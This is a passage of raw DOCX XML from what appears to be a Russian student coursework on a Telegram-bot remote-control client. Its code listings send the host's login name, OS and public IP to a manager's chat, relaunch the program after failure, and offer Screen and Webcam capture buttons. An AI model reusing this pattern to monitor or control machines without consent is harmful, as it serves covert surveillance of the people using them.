          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Для базовой реализации клиентской части используются модули языка программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00207FAB">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00207FAB">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">такие как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>telebot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidR="00756350" w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47955976" w14:textId="77777777" w:rsidR="00756350" w:rsidRDefault="00756350" w:rsidP="00207FAB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">После подключения модулей, в клиентской программе необходимо указать токен, полученный при создании бота и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>профиля менеджера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795E679" w14:textId="77777777" w:rsidR="00756350" w:rsidRDefault="00756350" w:rsidP="00207FAB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Идентификатор профиля менеджера получается у </w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>getmyid_bot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> при обращении командой </w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="00756350">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>непосредственно из аккаунта менеджера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB78B4B" w14:textId="77777777" w:rsidR="00141563" w:rsidRDefault="00486544" w:rsidP="00001562">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После создаётся экземпляр сервера. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0867A633" w14:textId="77777777" w:rsidR="00134290" w:rsidRDefault="00486544" w:rsidP="0001026E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг 2.1: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86544" w14:paraId="1E532034" w14:textId="77777777" w:rsidTr="00486544">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5F9FDD" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486544">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="709"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E8490A3" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486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val="ru-BY" w:eastAsia="ru-BY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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spell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token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'</w:t>
            </w:r>
            <w:proofErr w:type="gram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5258452459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BY"/>
              </w:rPr>
              <w:t>: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>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</w:t>
            </w:r>
            <w:proofErr w:type="gram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'</w:t>
            </w:r>
            <w:r w:rsidRPr="00486544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val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:br/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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spell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adm</w:t>
            </w:r>
            <w:r w:rsid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in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'1960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>XXXXXXX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'   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EADB59F" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:proofErr w:type="spell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bot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proofErr w:type="gram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telebot.</w:t>
            </w:r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TeleBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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token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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="191D9112" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="0001026E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76073B5C" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRPr="00486544" w:rsidRDefault="00207FAB" w:rsidP="0001026E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7D3BC6" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486544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При вызове методов из </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00486544">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TelegramAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00486544">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>результат метода</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> выполняемого клиентом, будет отправляться серверу, и сервером перенаправляться </w:t>
      </w:r>
      <w:r w:rsidR="00001562">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>в чат с менеджером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756ADE70" w14:textId="77777777" w:rsidR="00207FAB" w:rsidRPr="00001562" w:rsidRDefault="00001562" w:rsidP="00001562">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг 2.2: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86544" w:rsidRPr="006D560A" w14:paraId="38FD5944" w14:textId="77777777" w:rsidTr="00486544">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE461C8" w14:textId="77777777" w:rsidR="00486544" w:rsidRDefault="00486544" w:rsidP="0001026E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1787E923" w14:textId="77777777" w:rsidR="00486544" w:rsidRDefault="00486544" w:rsidP="00486544">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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</w:pPr>
            <w:r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  <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spell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try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: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  <w:t xml:space="preserve">   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r = </w:t>
            </w:r>
            <w:proofErr w:type="spell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requests.</w:t>
            </w:r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get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('http://ip.42.pl/raw')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  <w:t xml:space="preserve">   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IP = </w:t>
            </w:r>
            <w:proofErr w:type="spell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r.text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  <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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bot.</w:t>
            </w:r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send</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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_message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(</w:t>
            </w:r>
            <w:proofErr w:type="spell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adm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsid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  <w:t>in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,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  <w:t xml:space="preserve">   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'</w:t>
            </w:r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\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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n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User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</w:t>
            </w:r>
            <w:proofErr w:type="spell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online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!' +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  <w:t xml:space="preserve">   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'</w:t>
            </w:r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\n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' + '</w:t>
            </w:r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\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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n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PC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-&gt; ' + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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os.</w:t>
            </w:r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getlogin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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() +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  <w:t xml:space="preserve">   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'</w:t>
            </w:r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\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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n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OS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-&gt; ' + </w:t>
            </w:r>
            <w:proofErr w:type="spell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platform.</w:t>
            </w:r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system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() + ' ' + </w:t>
            </w:r>
            <w:proofErr w:type="spell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platform.</w:t>
            </w:r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release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() +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  <w:t xml:space="preserve">   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'</w:t>
            </w:r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\n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' +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  <w:t xml:space="preserve">   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'</w:t>
            </w:r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\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0048654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n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IP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-&gt; ' + IP,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</w:t>
            </w:r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  <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spell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reply_markup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=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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menu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0048654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)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54078F06" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486544">
            <w:pPr>
              <w:pStyle w:val="HTML"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>except</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>time.</w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>sleep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>(60)</w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>os.</w:t>
            </w:r>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>startfile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>sys.argv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00486544">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>[0])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4106B292" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="00486544">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A565174" w14:textId="77777777" w:rsidR="00486544" w:rsidRPr="00486544" w:rsidRDefault="00486544" w:rsidP="0001026E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7FC17C" w14:textId="77777777" w:rsidR="00001562" w:rsidRDefault="00001562" w:rsidP="006A5C0D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>С целью упрощения отправки команд менеджером, создаётся меню управления сервером, которое реализовано через встроенные</w:t>
      </w:r>
      <w:r w:rsidRPr="00001562">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00001562">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TelegramAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> функции</w:t>
      </w:r>
      <w:r w:rsidRPr="00001562">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>позволяющие создавать кнопки, отправляющие указанные команды серверу для последующей пересылки команд клиенту.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2E6C92" w14:textId="77777777" w:rsidR="00001562" w:rsidRPr="00001562" w:rsidRDefault="00001562" w:rsidP="00001562">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 2.3: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01562" w14:paraId="3FDD2FC8" w14:textId="77777777" w:rsidTr="00001562">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C07CB32" w14:textId="77777777" w:rsidR="001C0E58" w:rsidRDefault="001C0E58" w:rsidP="00001562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 w:themeColor="text1"/>
                <w:lang w:eastAsia="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="120B12CF" w14:textId="77777777" w:rsidR="00001562" w:rsidRPr="00001562" w:rsidRDefault="001C0E58" w:rsidP="00001562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BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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menu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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proofErr w:type="gramStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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ReplyKeyboardMarkup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd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()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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  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btn1 = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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KeyboardButton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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('/1</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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\n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&lt;&lt;')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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  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btn2 = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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KeyboardButton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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('/2</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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\n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&gt;&gt;')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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  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btn3 = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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KeyboardButton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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('/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Screen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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\n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')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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  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btn4 = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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KeyboardButton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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('/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Webcam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsid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>screen</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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\n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')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BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  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btn6 = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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types.</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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KeyboardButton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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('/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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Power</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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\n</w:t>
            </w:r>
            <w:r w:rsidR="00001562" w:rsidRPr="0000156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')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDD5A47" w14:textId="77777777" w:rsidR="00001562" w:rsidRPr="00001562" w:rsidRDefault="00001562" w:rsidP="00360450">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="237EEB44" w14:textId="77777777" w:rsidR="00001562" w:rsidRPr="00001562" w:rsidRDefault="00001562" w:rsidP="00360450">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="571460D9" w14:textId="77777777" w:rsidR="007F096C" w:rsidRDefault="007F096C" w:rsidP="00B11552">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc104228650"/>
      <w:bookmarkStart w:id="19" w:name="_Toc105065720"/>
      <w:r w:rsidRPr="007F096C">
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00001562">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00D05DF5" w:rsidRPr="007F096C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="00001562">
        <w:t>Решение проблемы распределённого управления</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="43D45A2B" w14:textId="77777777" w:rsidR="00B11552" w:rsidRPr="00B11552" w:rsidRDefault="00B11552" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44940EB2" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00B11552" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На момент написания данной курсовой работы основной проблемой при работе с сервером стало распределенное управление клиентами, а именно отправка сообщений отдельным клиентам или группам клиентов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F048BCA" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00B11552" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Для преодоления данной проблемы принято решение создать собственный сервер, принимающий запросы от менеджера, пересылая команды конкретному пользователю. Данное решение имеет ряд преимуществ и недостатков перед предыдущим представленным методом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C73CF5F" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00B11552" w:rsidP="00B11552">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Из преимуществ можно выделить:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E76D9E" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00B11552" w:rsidP="00B11552">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>доступность развёртывания сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166514DA" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00B11552" w:rsidP="00B11552">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>конфиденциальность пересылаемых данных</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDDA97D" w14:textId="77777777" w:rsidR="00B11552" w:rsidRDefault="00810C6F" w:rsidP="00B11552">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>гибкость в масштабировании</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC0663" w14:textId="77777777" w:rsidR="00810C6F" w:rsidRDefault="00810C6F" w:rsidP="00B11552">
      <w:pPr>
